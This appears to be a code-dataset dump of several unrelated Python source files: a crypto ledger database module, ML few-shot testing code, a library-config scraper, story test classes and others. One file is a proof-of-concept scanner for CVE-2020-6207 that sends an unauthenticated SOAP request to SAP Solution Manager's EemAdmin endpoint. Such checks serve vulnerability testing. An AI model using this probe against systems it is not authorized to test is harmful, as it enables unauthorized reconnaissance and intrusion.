max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
rotkehlchen/db/ledger_actions.py | rotkehlchenio/rotkehlchen | 137 | 45881 | <filename>rotkehlchen/db/ledger_actions.py
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from pysqlcipher3 import dbapi2 as sqlcipher
from rotkehlchen.accounting.ledger_actions import LedgerAction
from rotkehlchen.constants.limits import FREE_LEDGER_ACTIONS_LIMIT
from rotkehlchen.db.filtering import LedgerActionsFilterQuery
from rotkehlchen.errors.asset import UnknownAsset
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.user_messages import MessagesAggregator
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
class DBLedgerActions():
def __init__(self, database: 'DBHandler', msg_aggregator: MessagesAggregator):
self.db = database
self.msg_aggregator = msg_aggregator
def get_ledger_actions_and_limit_info(
self,
filter_query: LedgerActionsFilterQuery,
has_premium: bool,
) -> Tuple[List[LedgerAction], int]:
"""Gets all ledger actions for the query from the DB
        Also returns the total number of ledger actions found for the filter
"""
actions = self.get_ledger_actions(filter_query=filter_query, has_premium=has_premium)
cursor = self.db.conn.cursor()
query, bindings = filter_query.prepare(with_pagination=False)
query = 'SELECT COUNT(*) from ledger_actions ' + query
total_found_result = cursor.execute(query, bindings)
return actions, total_found_result.fetchone()[0]
def get_ledger_actions(
self,
filter_query: LedgerActionsFilterQuery,
has_premium: bool,
) -> List[LedgerAction]:
"""Returns a list of ledger actions optionally filtered by the given filter.
        The returned list is ordered according to the passed filter query
"""
cursor = self.db.conn.cursor()
query_filter, bindings = filter_query.prepare()
if has_premium:
query = 'SELECT * from ledger_actions ' + query_filter
results = cursor.execute(query, bindings)
else:
query = 'SELECT * FROM (SELECT * from ledger_actions ORDER BY timestamp DESC LIMIT ?) ' + query_filter # noqa: E501
results = cursor.execute(query, [FREE_LEDGER_ACTIONS_LIMIT] + bindings)
actions = []
for result in results:
try:
action = LedgerAction.deserialize_from_db(result)
except DeserializationError as e:
self.msg_aggregator.add_error(
                    f'Error deserializing Ledger Action from the DB. Skipping it. '
f'Error was: {str(e)}',
)
continue
except UnknownAsset as e:
self.msg_aggregator.add_error(
f'Error deserializing Ledger Action from the DB. Skipping it. '
f'Unknown asset {e.asset_name} found',
)
continue
actions.append(action)
return actions
def add_ledger_action(self, action: LedgerAction) -> int:
"""Adds a new ledger action to the DB and returns its identifier for success
May raise:
- sqlcipher.IntegrityError if there is a conflict at addition in _add_gitcoin_extra_data.
        If this error is raised, the connection needs to be rolled back by the caller.
"""
cursor = self.db.conn.cursor()
query = """
INSERT INTO ledger_actions(
timestamp, type, location, amount, asset, rate, rate_asset, link, notes
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);"""
cursor.execute(query, action.serialize_for_db())
identifier = cursor.lastrowid
action.identifier = identifier
self.db.conn.commit()
return identifier
def add_ledger_actions(self, actions: List[LedgerAction]) -> None:
"""Adds multiple ledger action to the DB
Is slow due to not using executemany since the ledger actions table
utilized an auto generated primary key.
"""
for action in actions:
try:
self.add_ledger_action(action)
except sqlcipher.IntegrityError: # pylint: disable=no-member
self.db.msg_aggregator.add_warning('Did not add ledger action to DB due to it already existing') # noqa: E501
log.warning(f'Did not add ledger action {action} to the DB due to it already existing') # noqa: E501
                self.db.conn.rollback()  # undo the addition and roll back to the last commit
def remove_ledger_action(self, identifier: int) -> Optional[str]:
"""Removes a ledger action from the DB by identifier
        Returns None on success or an error message on failure
"""
error_msg = None
cursor = self.db.conn.cursor()
cursor.execute(
'DELETE from ledger_actions WHERE identifier = ?;', (identifier,),
)
if cursor.rowcount < 1:
error_msg = (
f'Tried to delete ledger action with identifier {identifier} but '
f'it was not found in the DB'
)
self.db.conn.commit()
return error_msg
def edit_ledger_action(self, action: LedgerAction) -> Optional[str]:
"""Edits a ledger action from the DB by identifier
Does not edit the extra data at the moment
Returns None for success or an error message for error
"""
error_msg = None
cursor = self.db.conn.cursor()
query = """
UPDATE ledger_actions SET timestamp=?, type=?, location=?, amount=?,
asset=?, rate=?, rate_asset=?, link=?, notes=? WHERE identifier=?"""
db_action_tuple = action.serialize_for_db()
cursor.execute(query, (*db_action_tuple, action.identifier))
if cursor.rowcount != 1:
error_msg = (
f'Tried to edit ledger action with identifier {action.identifier} '
f'but it was not found in the DB'
)
self.db.conn.commit()
return error_msg
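# Hedged usage sketch (not part of the source file; `db_handler`, `msg_aggregator`
# and `action` are assumed to exist already):
#   ledger_db = DBLedgerActions(database=db_handler, msg_aggregator=msg_aggregator)
#   new_id = ledger_db.add_ledger_action(action)      # returns the DB identifier
#   error = ledger_db.edit_ledger_action(action)      # None on success
#   error = ledger_db.remove_ledger_action(new_id)    # None on success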
|
atlas/foundations_events/src/integration/__init__.py | DeepLearnI/atlas | 296 | 45894 | <gh_stars>100-1000
import foundations
from integration.test_consumers import TestConsumers |
examples/sum_sum_plus_one_lt.py | uta8a/Jikka | 139 | 45905 | # https://judge.kimiyuki.net/problem/sum-sum-plus-one-lt
from typing import *
def solve(a: List[int]) -> int:
n = len(a)
ans = 0
for i in range(n):
for j in range(i + 1, n):
ans += a[i] - a[j]
return ans
def main() -> None:
n = int(input())
a = list(map(int, input().split()))
assert len(a) == n
ans = solve(a)
print(ans)
if __name__ == "__main__":
main()
|
src/third_party/v8/js2c-wrap.py | morsvolia/mongo | 324 | 45920 | <filename>src/third_party/v8/js2c-wrap.py
#!/usr/bin/python2
import sys
js2c_dir = sys.argv[1]
sys.path.append(js2c_dir)
import js2c
srcs = sys.argv[2]
natives = sys.argv[3].split(',')
type = sys.argv[4]
compression = sys.argv[5]
js2c.JS2C(natives, [srcs], {'TYPE': type, 'COMPRESSION': compression})
|
starfish/core/morphology/Filter/map.py | haoxusci/starfish | 164 | 45921 | <gh_stars>100-1000
import warnings
from typing import Optional, Union
from starfish.core.morphology.binary_mask import BinaryMaskCollection
from starfish.core.types import FunctionSource, FunctionSourceBundle
from ._base import FilterAlgorithm
class Map(FilterAlgorithm):
"""
Map from input to output by applying a specified function to the input. The output must have
the same shape as the input.
Parameters
----------
func : Union[str, FunctionSourceBundle]
        Function to apply to each of the tiles in the input.
If this value is a string, then the ``module`` parameter is consulted to determine which
python package is used to find the function. If ``module`` is not specified, then the
default is :py:attr:`FunctionSource.np`.
If this value is a ``FunctionSourceBundle``, then the python package and module name is
obtained from the bundle.
module : Optional[FunctionSource]
Python module that serves as the source of the function. It must be listed as one of the
members of :py:class:`FunctionSource`.
Currently, the supported FunctionSources are:
- ``np``: the top-level package of numpy
- ``scipy``: the top-level package of scipy
This is being deprecated in favor of specifying the function as a ``FunctionSourceBundle``.
Examples
--------
Applying a binary opening function.
>>> from starfish.core.morphology.binary_mask.test import factories
>>> from starfish.morphology import Filter
>>> from starfish.types import FunctionSource
>>> from skimage.morphology import disk
>>> binary_mask_collection = factories.binary_mask_collection_2d()
>>> opener = Filter.Map(FunctionSource.scipy("morphology.binary_opening"), disk(4))
>>> opened = opener.run(binary_mask_collection)
"""
def __init__(
self,
func: Union[str, FunctionSourceBundle],
*func_args,
            module: Optional[FunctionSource] = None,
**func_kwargs,
) -> None:
if isinstance(func, str):
if module is not None:
warnings.warn(
f"The module parameter is being deprecated. Use "
f"`func=FunctionSource.{module.name}{func} instead.",
DeprecationWarning)
else:
module = FunctionSource.np
self._func = module(func)
elif isinstance(func, FunctionSourceBundle):
if module is not None:
raise ValueError(
"When passing in the function as a `FunctionSourceBundle`, module should not "
"be set."
)
self._func = func
self._func_args = func_args
self._func_kwargs = func_kwargs
def run(
self,
binary_mask_collection: BinaryMaskCollection,
n_processes: Optional[int] = None,
*args,
**kwargs
) -> BinaryMaskCollection:
"""Map from input to output by applying a specified function to the input.
Parameters
----------
binary_mask_collection : BinaryMaskCollection
BinaryMaskCollection to be filtered.
n_processes : Optional[int]
The number of processes to use for apply. If None, uses the output of os.cpu_count()
(default = None).
Returns
-------
BinaryMaskCollection
Return the results of filter as a new BinaryMaskCollection.
"""
# Apply the reducing function
return binary_mask_collection._apply(
self._func.resolve(),
*self._func_args,
**self._func_kwargs)
|
tools/bibliotheca_account_headers.py | dentes-purgo/opacclient | 120 | 45963 | <reponame>dentes-purgo/opacclient<filename>tools/bibliotheca_account_headers.py
#!/usr/bin/python3
# Searches for Bibliotheca libraries in the assets/bibs/ directory and checks whether they have a w3oini.txt configuration to
# find out what the headers in their account view are called.
import json
import os
import configparser
import urllib.request
from urllib.error import HTTPError, URLError
from multiprocessing import Pool
from socket import timeout
DIR = 'opacclient/opacapp/src/main/assets/bibs/'
HEADERS_LENT = 'opacclient/libopac/src/main/resources/bibliotheca/headers_lent.json'
HEADERS_RESERVATIONS = 'opacclient/libopac/src/main/resources/bibliotheca/headers_reservations.json'
def loadconfig(filename):
f = os.path.join(DIR, filename)
data = json.load(open(f))
if data['api'] == 'bibliotheca':
url = data['data']['baseurl']
try:
return urllib.request.urlopen(url + '/w3oini.txt', timeout=10).read().decode('iso-8859-1')
except (HTTPError, URLError, configparser.ParsingError):
print('could not find config for {}'.format(filename))
return None
except timeout:
print('timeout for {}'.format(filename))
return None
def handleconfig(filename, config_str):
config = configparser.RawConfigParser(allow_no_value=True, strict=False)
try:
config.read_string(config_str)
for i in range(1, 21):
conf = config.get("ANZEIGEKONTOFELDER", "konto" + str(i))
key = conf.split("#")[0].lower()
titles = conf.split("#")[1:]
type_lent = None
type_reservations = None
if key in ('exemplarnr', 'buchungsnr'):
type_lent = 'barcode'
elif key == 'verf':
type_lent = type_reservations = 'author'
elif key == 'titel':
type_lent = type_reservations = 'title'
elif key == 'frist':
type_lent = 'returndate'
elif key == 'bereit':
type_reservations = 'availability'
elif key == 'ausleihstatus':
type_lent = 'status'
elif key == 'zwst':
type_lent = 'homebranch'
type_reservations = 'branch'
elif key == 'ausleihstelle':
type_lent = 'lendingbranch'
elif key == 'mediengrp':
type_lent = type_reservations = 'format'
elif key == 'bereit bis':
type_reservations = 'expirationdate'
elif key == 'reserviert' or key == 'saeumnisgebuehr':
pass
if type_lent is not None:
for title in titles:
if title not in headers_lent:
print('adding {} to headers_lent.json with meaning {}'.format(title, type_lent))
headers_lent[title] = type_lent
elif headers_lent[title] != type_lent:
print('CONFLICT: {} should be {}, but is {} in headers_lent.json!'
.format(title, type_lent, headers_lent[title]))
if type_reservations is not None:
for title in titles:
if title not in headers_reservations:
print('adding {} to headers_reservations.json with meaning {}'.format(title,
type_reservations))
headers_reservations[title] = type_reservations
elif headers_reservations[title] != type_reservations:
print('CONFLICT: {} should be {}, but is {} in headers_reservations.json!'
.format(title, type_reservations, headers_reservations[title]))
except configparser.ParsingError:
print('could not parse config for {}'.format(filename))
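# Hedged illustration (format inferred from the parsing above, not checked against a
# live OPAC): an [ANZEIGEKONTOFELDER] entry in w3oini.txt is expected to look like
#   konto1 = exemplarnr#Barcode#Medien-Nr
# i.e. an internal key followed by one or more display titles, all separated by '#'.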
def save(filename, data):
with open(filename, 'w') as fp:
json.dump(data, fp, sort_keys=True, indent=4)
fp.write("\n")
if __name__ == '__main__':
print('loading configs')
p = Pool(50)
filenames = os.listdir(DIR)
configs = p.map(loadconfig, filenames)
print('received {} configs'.format(sum(x is not None for x in configs)))
print('parsing configs')
headers_lent = json.load(open(HEADERS_LENT))
headers_reservations = json.load(open(HEADERS_RESERVATIONS))
for (filename, config) in zip(filenames, configs):
if config is not None:
handleconfig(filename, config)
save(HEADERS_LENT, headers_lent)
save(HEADERS_RESERVATIONS, headers_reservations) |
2020/CVE-2020-6207/poc/pocsploit/CVE-2020-6207.py | hjyuan/reapoc | 421 | 46012 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''SAP Solution Manager remote unauthorized OS commands execution''',
"description": '''SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.''',
"severity": "critical",
"references": [
"https://launchpad.support.sap.com/#/notes/2890213",
"https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305",
"https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf",
"https://github.com/chipik/SAP_EEM_CVE-2020-6207",
"https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/",
"https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-6207",
"cwe-id": "CWE-306"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "sap", "solman", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/EemAdminService/EemAdmin"""
method = "POST"
data = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>"""
headers = {'SOAPAction': '""', 'Content-Type': 'text/xml; charset=UTF-8', 'Connection': 'close'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (""":Envelope""" in resp0.text and """:Body""" in resp0.text and """:getAllAgentInfoResponse""" in resp0.text) and (resp0.status_code == 200) and ("""text/xml""" in str(resp0.headers) and """SAP NetWeaver Application Server""" in str(resp0.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
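# Hedged usage sketch (the target URL below is a placeholder, not from the source):
#   result = poc("http://solman.example.com:50000")
#   if result.get("success"):
#       print("vulnerable:", result["payload"])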
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
tests/models/r-net_dynamic_test.py | matthew-z/pytorch_rnet | 227 | 46013 | <filename>tests/models/r-net_dynamic_test.py
from allennlp.common.testing import ModelTestCase
from qa.squad.rnet import RNet
class RNetDynamicTest(ModelTestCase):
def setUp(self):
super().setUp()
self.set_up_model('tests/fixtures/rnet/experiment_dynamic.jsonnet',
'tests/fixtures/data/squad.json')
def test_model_can_train_save_and_load(self):
self.ensure_model_can_train_save_and_load(self.param_file)
|
utils/tester.py | niloofar17/MetaDialog | 204 | 46022 | # coding: utf-8
from typing import List, Tuple, Dict
import torch
import logging
import sys
import os
import copy
import json
import collections
import subprocess
from tqdm import tqdm, trange
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
# My Staff
from utils.iter_helper import PadCollate, FewShotDataset
from utils.preprocessor import FewShotFeature, ModelInput
from utils.device_helper import prepare_model
from utils.model_helper import make_model, load_model
from models.modules.transition_scorer import FewShotTransitionScorer
from models.few_shot_seq_labeler import FewShotSeqLabeler
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO,
stream=sys.stdout)
logger = logging.getLogger(__name__)
RawResult = collections.namedtuple("RawResult", ["feature", "prediction"])
class TesterBase:
"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""
def __init__(self, opt, device, n_gpu):
if opt.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
opt.gradient_accumulation_steps))
self.opt = opt
# Following is used to split the batch to save space
self.batch_size = opt.test_batch_size
self.device = device
self.n_gpu = n_gpu
def do_test(self, model: torch.nn.Module, test_features: List[FewShotFeature], id2label: dict,
log_mark: str = 'test_pred'):
logger.info("***** Running eval *****")
# print("***** Running eval *****")
logger.info(" Num features = %d", len(test_features))
logger.info(" Batch size = %d", self.batch_size)
all_results = []
model.eval()
data_loader = self.get_data_loader(test_features)
for batch in tqdm(data_loader, desc="Eval-Batch Progress"):
batch = tuple(t.to(self.device) for t in batch) # multi-gpu does scattering it-self
with torch.no_grad():
predictions = self.do_forward(batch, model)
for i, feature_gid in enumerate(batch[0]): # iter over feature global id
prediction = predictions[i]
feature = test_features[feature_gid.item()]
all_results.append(RawResult(feature=feature, prediction=prediction))
if model.emb_log:
model.emb_log.write('text_' + str(feature_gid.item()) + '\t'
+ '\t'.join(feature.test_feature_item.data_item.seq_in) + '\n')
# close file handler
if model.emb_log:
model.emb_log.close()
scores = self.eval_predictions(all_results, id2label, log_mark)
return scores
def get_data_loader(self, features):
dataset = TensorDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = RandomSampler(dataset)
else:
sampler = DistributedSampler(dataset)
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size)
return data_loader
def clone_model(self, model, id2label):
# get a new instance
return copy.deepcopy(model)
def unpack_feature(self, feature) -> List[torch.Tensor]:
raise NotImplementedError
def do_forward(self, batch, model):
prediction = model(*batch)
return prediction
def eval_predictions(self, *args, **kwargs) -> float:
raise NotImplementedError
class FewShotTester(TesterBase):
"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""
def __init__(self, opt, device, n_gpu):
super(FewShotTester, self).__init__(opt, device, n_gpu)
def get_data_loader(self, features):
dataset = FewShotDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = SequentialSampler(dataset)
else:
sampler = DistributedSampler(dataset)
pad_collate = PadCollate(dim=-1, sp_dim=-2, sp_item_idx=[3, 8, 12]) # nwp_index, spt_tgt need special padding
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size, collate_fn=pad_collate)
return data_loader
def eval_predictions(self, all_results: List[RawResult], id2label: dict, log_mark: str) -> float:
""" Our result score is average score of all few-shot batches. """
all_batches = self.reform_few_shot_batch(all_results)
all_scores = []
for b_id, fs_batch in all_batches:
f1 = self.eval_one_few_shot_batch(b_id, fs_batch, id2label, log_mark)
all_scores.append(f1)
return sum(all_scores) * 1.0 / len(all_scores)
def eval_one_few_shot_batch(self, b_id, fs_batch: List[RawResult], id2label: dict, log_mark: str) -> float:
pred_file_name = '{}.{}.txt'.format(log_mark, b_id)
output_prediction_file = os.path.join(self.opt.output_dir, pred_file_name)
if self.opt.task == 'sl':
self.writing_sl_prediction(fs_batch, output_prediction_file, id2label)
precision, recall, f1 = self.eval_with_script(output_prediction_file)
elif self.opt.task == 'sc':
precision, recall, f1 = self.writing_sc_prediction(fs_batch, output_prediction_file, id2label)
else:
raise ValueError("Wrong task.")
return f1
def writing_sc_prediction(self, fs_batch: List[RawResult], output_prediction_file: str, id2label: dict):
tp, fp, fn = 0, 0, 0
writing_content = []
for result in fs_batch:
pred_ids = result.prediction # prediction is directly the predict ids [pad is removed in decoder]
feature = result.feature
pred_label = set([id2label[pred_id] for pred_id in pred_ids])
label = set(feature.test_feature_item.data_item.label)
writing_content.append({
'seq_in': feature.test_feature_item.data_item.seq_in,
'pred': list(pred_label),
'label': list(label),
})
tp, fp, fn = self.update_f1_frag(pred_label, label, tp, fp, fn) # update tp, fp, fn
with open(output_prediction_file, "w") as writer:
json.dump(writing_content, writer, indent=2)
return self.compute_f1(tp, fp, fn)
def update_f1_frag(self, pred_label, label, tp=0, fp=0, fn=0):
tp += len(pred_label & label)
fp += len(pred_label - label)
fn += len(label - pred_label)
return tp, fp, fn
def compute_f1(self, tp, fp, fn):
tp += 0.0000001 # to avoid zero division
fp += 0.0000001
fn += 0.0000001
precision = 1.0 * tp / (tp + fp)
recall = 1.0 * tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)
return precision, recall, f1
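    # Hedged worked example of the F1 arithmetic above (the epsilon terms omitted):
    # tp=8, fp=2, fn=4 -> precision = 8/10 = 0.80, recall = 8/12 ~= 0.667,
    # f1 = 2 * 0.80 * 0.667 / (0.80 + 0.667) ~= 0.727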
def writing_sl_prediction(self, fs_batch: List[RawResult], output_prediction_file: str, id2label: dict):
writing_content = []
for result in fs_batch:
prediction = result.prediction
feature = result.feature
pred_ids = prediction # prediction is directly the predict ids
if len(pred_ids) != len(feature.test_feature_item.data_item.seq_in):
raise RuntimeError("Failed to align the pred_ids to texts: {},{} \n{},{} \n{},{}".format(
len(pred_ids), pred_ids,
len(feature.test_feature_item.data_item.seq_in), feature.test_feature_item.data_item.seq_in,
len(feature.test_feature_item.data_item.seq_out), feature.test_feature_item.data_item.seq_out
))
for pred_id, word, true_label in zip(pred_ids, feature.test_feature_item.data_item.seq_in, feature.test_feature_item.data_item.seq_out):
pred_label = id2label[pred_id]
writing_content.append('{0} {1} {2}'.format(word, true_label, pred_label))
writing_content.append('')
with open(output_prediction_file, "w") as writer:
writer.write('\n'.join(writing_content))
def eval_with_script(self, output_prediction_file):
script_args = ['perl', self.opt.eval_script]
with open(output_prediction_file, 'r') as res_file:
p = subprocess.Popen(script_args, stdout=subprocess.PIPE, stdin=res_file)
p.wait()
std_results = p.stdout.readlines()
if self.opt.verbose:
for r in std_results:
print(r)
std_results = str(std_results[1]).split()
precision = float(std_results[3].replace('%;', ''))
recall = float(std_results[5].replace('%;', ''))
f1 = float(std_results[7].replace('%;', '').replace("\\n'", ''))
return precision, recall, f1
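    # Hedged note on the parsing above: it assumes a conlleval-style summary line,
    # e.g.
    #   accuracy:  97.93%; precision:  85.11%; recall:  82.29%; FB1:  83.68
    # whose whitespace-split tokens 3, 5 and 7 hold precision, recall and F1.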
def reform_few_shot_batch(self, all_results: List[RawResult]) -> List[List[Tuple[int, RawResult]]]:
"""
        Our result score is the average score over all few-shot batches.
        So here, we classify all results according to their few-shot batch id.
"""
all_batches = {}
for result in all_results:
b_id = result.feature.batch_gid
if b_id not in all_batches:
all_batches[b_id] = [result]
else:
all_batches[b_id].append(result)
return sorted(all_batches.items(), key=lambda x: x[0])
def unpack_feature(self, feature: FewShotFeature) -> List[torch.Tensor]:
ret = [
torch.LongTensor([feature.gid]),
# test
feature.test_input.token_ids,
feature.test_input.segment_ids,
feature.test_input.nwp_index,
feature.test_input.input_mask,
feature.test_input.output_mask,
# support
feature.support_input.token_ids,
feature.support_input.segment_ids,
feature.support_input.nwp_index,
feature.support_input.input_mask,
feature.support_input.output_mask,
# target
feature.test_target,
feature.support_target,
# Special
torch.LongTensor([len(feature.support_feature_items)]), # support num
]
return ret
def do_forward(self, batch, model):
(
gid, # 0
test_token_ids, # 1
test_segment_ids, # 2
test_nwp_index, # 3
test_input_mask, # 4
test_output_mask, # 5
support_token_ids, # 6
support_segment_ids, # 7
support_nwp_index, # 8
support_input_mask, # 9
support_output_mask, # 10
test_target, # 11
support_target, # 12
support_num, # 13
) = batch
prediction = model(
# loss, prediction = model(
test_token_ids,
test_segment_ids,
test_nwp_index,
test_input_mask,
test_output_mask,
support_token_ids,
support_segment_ids,
support_nwp_index,
support_input_mask,
support_output_mask,
test_target,
support_target,
support_num,
)
return prediction
def get_value_from_order_dict(self, order_dict, key):
""""""
for k, v in order_dict.items():
if key in k:
return v
return []
def clone_model(self, model, id2label):
""" clone only part of params """
# deal with data parallel model
new_model: FewShotSeqLabeler
old_model: FewShotSeqLabeler
if self.opt.local_rank != -1 or self.n_gpu > 1 and hasattr(model, 'module'): # the model is parallel class here
old_model = model.module
else:
old_model = model
emission_dict = old_model.emission_scorer.state_dict()
old_num_tags = len(self.get_value_from_order_dict(emission_dict, 'label_reps'))
config = {'num_tags': len(id2label), 'id2label': id2label}
if 'num_anchors' in old_model.config:
config['num_anchors'] = old_model.config['num_anchors'] # Use previous model's random anchors.
# get a new instance for different domain
new_model = make_model(opt=self.opt, config=config)
new_model = prepare_model(self.opt, new_model, self.device, self.n_gpu)
if self.opt.local_rank != -1 or self.n_gpu > 1:
sub_new_model = new_model.module
else:
sub_new_model = new_model
''' copy weights and stuff '''
if old_model.opt.task == 'sl' and old_model.transition_scorer:
# copy one-by-one because target transition and decoder will be left un-assigned
sub_new_model.context_embedder.load_state_dict(old_model.context_embedder.state_dict())
sub_new_model.emission_scorer.load_state_dict(old_model.emission_scorer.state_dict())
for param_name in ['backoff_trans_mat', 'backoff_start_trans_mat', 'backoff_end_trans_mat']:
sub_new_model.transition_scorer.state_dict()[param_name].copy_(
old_model.transition_scorer.state_dict()[param_name].data)
else:
sub_new_model.load_state_dict(old_model.state_dict())
return new_model
class SchemaFewShotTester(FewShotTester):
def __init__(self, opt, device, n_gpu):
super(SchemaFewShotTester, self).__init__(opt, device, n_gpu)
def get_data_loader(self, features):
""" add label index into special padding """
dataset = FewShotDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = SequentialSampler(dataset)
else:
sampler = DistributedSampler(dataset)
pad_collate = PadCollate(dim=-1, sp_dim=-2, sp_item_idx=[3, 8, 12, 16]) # nwp_index, spt_tgt need sp-padding
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size, collate_fn=pad_collate)
return data_loader
def unpack_feature(self, feature: FewShotFeature) -> List[torch.Tensor]:
ret = [
torch.LongTensor([feature.gid]),
# test
feature.test_input.token_ids,
feature.test_input.segment_ids,
feature.test_input.nwp_index,
feature.test_input.input_mask,
feature.test_input.output_mask,
# support
feature.support_input.token_ids,
feature.support_input.segment_ids,
feature.support_input.nwp_index,
feature.support_input.input_mask,
feature.support_input.output_mask,
# target
feature.test_target,
feature.support_target,
# Special
torch.LongTensor([len(feature.support_feature_items)]), # support num
# label feature
feature.label_input.token_ids,
feature.label_input.segment_ids,
feature.label_input.nwp_index,
feature.label_input.input_mask,
feature.label_input.output_mask,
]
return ret
def do_forward(self, batch, model):
(
gid, # 0
test_token_ids, # 1
test_segment_ids, # 2
test_nwp_index, # 3
test_input_mask, # 4
test_output_mask, # 5
support_token_ids, # 6
support_segment_ids, # 7
support_nwp_index, # 8
support_input_mask, # 9
support_output_mask, # 10
test_target, # 11
support_target, # 12
support_num, # 13
# label feature
label_token_ids, # 14
label_segment_ids, # 15
label_nwp_index, # 16
label_input_mask, # 17
label_output_mask, # 18
) = batch
prediction = model(
test_token_ids,
test_segment_ids,
test_nwp_index,
test_input_mask,
test_output_mask,
support_token_ids,
support_segment_ids,
support_nwp_index,
support_input_mask,
support_output_mask,
test_target,
support_target,
support_num,
# label feature
label_token_ids,
label_segment_ids,
label_nwp_index,
label_input_mask,
label_output_mask,
)
return prediction
def eval_check_points(opt, tester, test_features, test_id2label, device):
all_cpt_file = list(filter(lambda x: '.cpt.pl' in x, os.listdir(opt.saved_model_path)))
all_cpt_file = sorted(all_cpt_file,
key=lambda x: int(x.replace('model.step', '').replace('.cpt.pl', '')))
max_score = 0
for cpt_file in all_cpt_file:
cpt_model = load_model(os.path.join(opt.saved_model_path, cpt_file))
testing_model = tester.clone_model(cpt_model, test_id2label)
if opt.mask_transition and opt.task == 'sl':
testing_model.label_mask = opt.test_label_mask.to(device)
test_score = tester.do_test(testing_model, test_features, test_id2label, log_mark='test_pred')
if test_score > max_score:
max_score = test_score
logger.info('cpt_file:{} - test:{}'.format(cpt_file, test_score))
return max_score
|
tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | 187 | 46026 | from enum import Enum
from stories import story
# Base classes.
class ChildWithNull:
@story
def x(I):
I.one
class NextChildWithNull:
@story
def y(I):
I.two
class ParentWithNull:
@story
def a(I):
I.before
I.x
I.after
class SequenceParentWithNull:
@story
def a(I):
I.before
I.x
I.y
I.after
class ChildWithList:
@story
def x(I):
I.one
ChildWithList.x.failures(["foo", "bar", "baz"])
class NextChildWithList:
@story
def y(I):
I.two
NextChildWithList.y.failures(["spam", "ham", "eggs"])
class ParentWithList:
@story
def a(I):
I.before
I.x
I.after
ParentWithList.a.failures(["foo", "bar", "baz"])
class WideParentWithList:
@story
def a(I):
I.before
I.x
I.after
WideParentWithList.a.failures(["foo", "bar", "baz", "quiz"])
class ShrinkParentWithList:
@story
def a(I):
I.before
I.x
I.after
ShrinkParentWithList.a.failures(["foo", "quiz"])
class ChildWithEnum:
@story
def x(I):
I.one
@x.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class NextChildWithEnum:
@story
def y(I):
I.two
@y.failures
class Errors(Enum):
spam = 1
ham = 2
eggs = 3
class ParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ParentWithEnum.a.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class WideParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@WideParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
bar = 2
baz = 3
quiz = 4
class ShrinkParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ShrinkParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
quiz = 4
|
Qt-Widgets-and-more/debuggingHelper/QWAMTypes.py | jgompis/kdabtv | 140 | 46045 | # Check http://doc.qt.io/qtcreator/creator-debugging-helpers.html
# for more details or look at qttypes.py, stdtypes.py, boosttypes.py
# for more complex examples.
from dumper import Children, SubItem, UnnamedSubItem, DumperBase
from utils import DisplayFormat, TypeCode
from qttypes import *
import struct
####################### Your code below #######################
### Part 1
def qdump__Foo(d, value):
i = value["i"].integer()
